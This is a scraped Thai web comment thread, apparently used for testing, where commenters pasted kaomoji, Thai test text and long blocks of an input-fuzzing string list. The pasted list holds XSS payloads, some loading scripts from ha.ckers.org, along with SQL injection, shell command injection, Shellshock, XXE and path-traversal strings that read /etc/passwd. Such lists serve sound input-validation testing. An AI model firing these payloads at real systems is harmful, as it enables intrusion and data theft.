แสดงความคิดเห็น
23 ความคิดเห็น
เม้นแรก
Reply แรก
เม้น 1.1
เม้น 1.1.1 // แก้ไขโดยแอนฉวี อิอิ
^ กำมาไม่ทัน
ทดสอบ..
ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ
(。 ∀ 。)
`ィ(´∀`∩
__ロ(,_,*)
・( ̄∀ ̄)・:*:
゚・ヾ╲(。‿。)╱・゚
,。・:*:・゜’( ω )。・:*:・゜’
(╯°°)╯︵ ┻━┻)
(ノಥ益ಥ)ノ ┻━┻
┬─┬ノ( º _ ºノ)
( ͡° ͜ʖ ͡°)
หกหกหกหกกหหก
<script>alert(123)</script>
<script>alert('123');</script>
<img src=x onerror=alert(123) />
<svg><script>123<1>alert(123)</script>
"><script>alert(123)</script>
'><script>alert(123)</script>
><script>alert(123)</script>
</script><script>alert(123)</script>
< / script >< script >alert(123)< / script >
onfocus=JaVaSCript:alert(123) autofocus
" onfocus=JaVaSCript:alert(123) autofocus
' onfocus=JaVaSCript:alert(123) autofocus
<script>alert(123)</script>
<sc<script>ript>alert(123)</sc</script>ript>
--><script>alert(123)</script>
";alert(123);t="
';alert(123);t='
JavaSCript:alert(123)
;alert(123);
src=JaVaSCript:prompt(132)
"><script>alert(123);</script x="
'><script>alert(123);</script x='
><script>alert(123);</script x=
" autofocus onkeyup="javascript:alert(123)
' autofocus onkeyup='javascript:alert(123)
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" >test</a>
<a href="\x0Fjavascript:javascript:alert(1)" >test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" >test</a>
<a href="\x05javascript:javascript:alert(1)" >test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" >test</a>
<a href="\x18javascript:javascript:alert(1)" >test</a>
<a href="\x11javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" >test</a>
<a href="\x17javascript:javascript:alert(1)" >test</a>
<a href="\x03javascript:javascript:alert(1)" >test</a>
<a href="\x0Ejavascript:javascript:alert(1)" >test</a>
<a href="\x1Ajavascript:javascript:alert(1)" >test</a>
<a href="\x00javascript:javascript:alert(1)" >test</a>
<a href="\x10javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" >test</a>
<a href="\x20javascript:javascript:alert(1)" >test</a>
<a href="\x13javascript:javascript:alert(1)" >test</a>
<a href="\x09javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" >test</a>
<a href="\x14javascript:javascript:alert(1)" >test</a>
<a href="\x19javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" >test</a>
<a href="\x1Fjavascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" >test</a>
<a href="\x1Djavascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" >test</a>
<a href="\x07javascript:javascript:alert(1)" >test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" >test</a>
<a href="\x04javascript:javascript:alert(1)" >test</a>
<a href="\x01javascript:javascript:alert(1)" >test</a>
<a href="\x08javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" >test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" >test</a>
<a href="\x12javascript:javascript:alert(1)" >test</a>
<a href="\x0Djavascript:javascript:alert(1)" >test</a>
<a href="\x0Ajavascript:javascript:alert(1)" >test</a>
<a href="\x0Cjavascript:javascript:alert(1)" >test</a>
<a href="\x15javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" >test</a>
<a href="\x16javascript:javascript:alert(1)" >test</a>
<a href="\x02javascript:javascript:alert(1)" >test</a>
<a href="\x1Bjavascript:javascript:alert(1)" >test</a>
<a href="\x06javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" >test</a>
<a href="\x1Ejavascript:javascript:alert(1)" >test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" >test</a>
<a href="\x1Cjavascript:javascript:alert(1)" >test</a>
<a href="javascript\x00:javascript:alert(1)" >test</a>
<a href="javascript\x3A:javascript:alert(1)" >test</a>
<a href="javascript\x09:javascript:alert(1)" >test</a>
<a href="javascript\x0D:javascript:alert(1)" >test</a>
<a href="javascript\x0A:javascript:alert(1)" >test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
<img \x00src=x >
<img \x47src=x >
<img \x11src=x >
<img \x12src=x >
<img\x47src=x >
<img\x10src=x >
<img\x13src=x >
<img\x32src=x >
<img\x47src=x >
<img\x11src=x >
<img \x47src=x >
<img \x34src=x >
<img \x39src=x >
<img \x00src=x >
<img src\x09=x >
<img src\x10=x >
<img src\x13=x >
<img src\x32=x >
<img src\x12=x >
<img src\x11=x >
<img src\x00=x >
<img src\x47=x >
<img src=x\x09>
<img src=x\x10>
<img src=x\x11>
<img src=x\x12>
<img src=x\x13>
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<a href=javascript:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
<u oncopy=alert()> Copy me</u>
<i onwheel=alert(1)> Scroll over me </i>
<plaintext>
</textarea><script>alert(123)</script>
มือระเบิดชัดๆ
/-ภ/ภ-/ภ/ภ ๅ/-ๅ-ๅ-/ๅ-ๅ/-/ๅ-ๅ-ๅ-- ๅ/-ๅ/ -ๅ/-/ๅ- ๅ/-////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
ทดสอบ ทดสอบทดสอบทดสอบทดสอบทดสอบทดสอบทดสอบทดสอบ
ทดสอบคำหยาบ -สาส -สัตว์ -เ-้ย -
หยาบคาย
undefined
undef
null
NULL
(null)
nil
NIL
true
false
True
False
TRUE
FALSE
None
hasOwnProperty
\
\\
# Numeric Strings
#
# Strings which can be interpreted as numeric
0
1
1.00
$1.00
1/2
1E2
1E02
1E+02
-1
-1.00
-$1.00
-1/2
-1E2
-1E02
-1E+02
1/0
0/0
-2147483648/-1
-9223372036854775808/-1
-0
-0.0
+0
+0.0
0.00
0..0
.
0.0.0
0,00
0,,0
,
0,0,0
0.0/0
1.0/0.0
0.0/0.0
1,0/0,0
0,0/0,0
--1
-
-.
-,
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
NaN
Infinity
-Infinity
INF
1#INF
-1#IND
1#QNAN
1#SNAN
1#IND
0x0
0xffffffff
0xffffffffffffffff
0xabad1dea
123456789012345678901234567890123456789
1,000.00
1 000.00
1'000.00
1,000,000.00
1 000 000.00
1'000'000.00
1.000,00
1 000,00
1'000,00
1.000.000,00
1 000 000,00
1'000'000,00
01000
08
09
2.2250738585072011e-308
,./;'[]\-=
<>?:"{}_+
!@#$%^&*()`~
<script>alert(123)</script>
<script>alert('123');</script>
<img src=x onerror=alert(123) />
<svg><script>123<1>alert(123)</script>
"><script>alert(123)</script>
'><script>alert(123)</script>
><script>alert(123)</script>
</script><script>alert(123)</script>
< / script >< script >alert(123)< / script >
onfocus=JaVaSCript:alert(123) autofocus
" onfocus=JaVaSCript:alert(123) autofocus
' onfocus=JaVaSCript:alert(123) autofocus
<script>alert(123)</script>
<sc<script>ript>alert(123)</sc</script>ript>
--><script>alert(123)</script>
";alert(123);t="
';alert(123);t='
JavaSCript:alert(123)
;alert(123);
src=JaVaSCript:prompt(132)
"><script>alert(123);</script x="
'><script>alert(123);</script x='
><script>alert(123);</script x=
" autofocus onkeyup="javascript:alert(123)
' autofocus onkeyup='javascript:alert(123)
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" >test</a>
<a href="\x0Fjavascript:javascript:alert(1)" >test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" >test</a>
<a href="\x05javascript:javascript:alert(1)" >test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" >test</a>
<a href="\x18javascript:javascript:alert(1)" >test</a>
<a href="\x11javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" >test</a>
<a href="\x17javascript:javascript:alert(1)" >test</a>
<a href="\x03javascript:javascript:alert(1)" >test</a>
<a href="\x0Ejavascript:javascript:alert(1)" >test</a>
<a href="\x1Ajavascript:javascript:alert(1)" >test</a>
<a href="\x00javascript:javascript:alert(1)" >test</a>
<a href="\x10javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" >test</a>
<a href="\x20javascript:javascript:alert(1)" >test</a>
<a href="\x13javascript:javascript:alert(1)" >test</a>
<a href="\x09javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" >test</a>
<a href="\x14javascript:javascript:alert(1)" >test</a>
<a href="\x19javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" >test</a>
<a href="\x1Fjavascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" >test</a>
<a href="\x1Djavascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" >test</a>
<a href="\x07javascript:javascript:alert(1)" >test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" >test</a>
<a href="\x04javascript:javascript:alert(1)" >test</a>
<a href="\x01javascript:javascript:alert(1)" >test</a>
<a href="\x08javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" >test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" >test</a>
<a href="\x12javascript:javascript:alert(1)" >test</a>
<a href="\x0Djavascript:javascript:alert(1)" >test</a>
<a href="\x0Ajavascript:javascript:alert(1)" >test</a>
<a href="\x0Cjavascript:javascript:alert(1)" >test</a>
<a href="\x15javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" >test</a>
<a href="\x16javascript:javascript:alert(1)" >test</a>
<a href="\x02javascript:javascript:alert(1)" >test</a>
<a href="\x1Bjavascript:javascript:alert(1)" >test</a>
<a href="\x06javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" >test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" >test</a>
<a href="\x1Ejavascript:javascript:alert(1)" >test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" >test</a>
<a href="\x1Cjavascript:javascript:alert(1)" >test</a>
<a href="javascript\x00:javascript:alert(1)" >test</a>
<a href="javascript\x3A:javascript:alert(1)" >test</a>
<a href="javascript\x09:javascript:alert(1)" >test</a>
<a href="javascript\x0D:javascript:alert(1)" >test</a>
<a href="javascript\x0A:javascript:alert(1)" >test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
<img \x00src=x >
<img \x47src=x >
<img \x11src=x >
<img \x12src=x >
<img\x47src=x >
<img\x10src=x >
<img\x13src=x >
<img\x32src=x >
<img\x47src=x >
<img\x11src=x >
<img \x47src=x >
<img \x34src=x >
<img \x39src=x >
<img \x00src=x >
<img src\x09=x >
<img src\x10=x >
<img src\x13=x >
<img src\x32=x >
<img src\x12=x >
<img src\x11=x >
<img src\x00=x >
<img src\x47=x >
<img src=x\x09>
<img src=x\x10>
<img src=x\x11>
<img src=x\x12>
<img src=x\x13>
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<a href=javascript:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
<u oncopy=alert()> Copy me</u>
<i onwheel=alert(1)> Scroll over me </i>
<plaintext>
</textarea><script>alert(123)</script>
1;DROP TABLE users
1'; DROP TABLE users-- 1
' OR 1=1 -- 1
' OR '1'='1
%
_
# Server Code Injection
#
# Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)
-
--
--version
--help
$USER
/dev/null; touch /tmp/blns.fail ; echo
`touch /tmp/blns.fail`
$(touch /tmp/blns.fail)
@{[system "touch /tmp/blns.fail"]}
eval("puts 'hello world'")
System("ls -al /")
`ls -al /`
Kernel.exec("ls -al /")
Kernel.exit(1)
%x('ls -al /')
# String which can reveal system files when parsed by a badly configured XML parser
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
$HOME
$ENV{'HOME'}
%d
%s
{0}
%*.*s
File:///
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/hosts
() { 0; }; touch /tmp/blns.shellshock1.fail;
() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
<<< %s(un='%s') = %u
CON
PRN
AUX
CLOCK$
NUL
A:
ZZ:
COM1
LPT1
LPT2
LPT3
COM2
COM3
COM4
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
0️
หยาบkind
สวัสดี GPI aaawww.google.com
ระวังหลุดนะ //มองบนนน
ลบ comment เก๊าทำไมมมมม T^T แมวกำลังเต้นอย่างมันเลอ
ทดสอบ ..... แก้ไข
ทดสอ/-ภ/-ภ/-ภ/ภ/-ภ
13123123123213123
รายชื่อผู้ถูกใจความเห็นนี้ คน
แจ้งลบความคิดเห็น
คุณต้องการจะลบความคิดเห็นนี้หรือไม่ ?
3 ถูกเลือกโดยทีมงาน
เม้นแรก
ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ
(。 ∀ 。)
`ィ(´∀`∩
__ロ(,_,*)
・( ̄∀ ̄)・:*:
゚・ヾ╲(。‿。)╱・゚
,。・:*:・゜’( ω )。・:*:・゜’
(╯°°)╯︵ ┻━┻)
(ノಥ益ಥ)ノ ┻━┻
┬─┬ノ( º _ ºノ)
( ͡° ͜ʖ ͡°)
สวัสดี GPI aaawww.google.com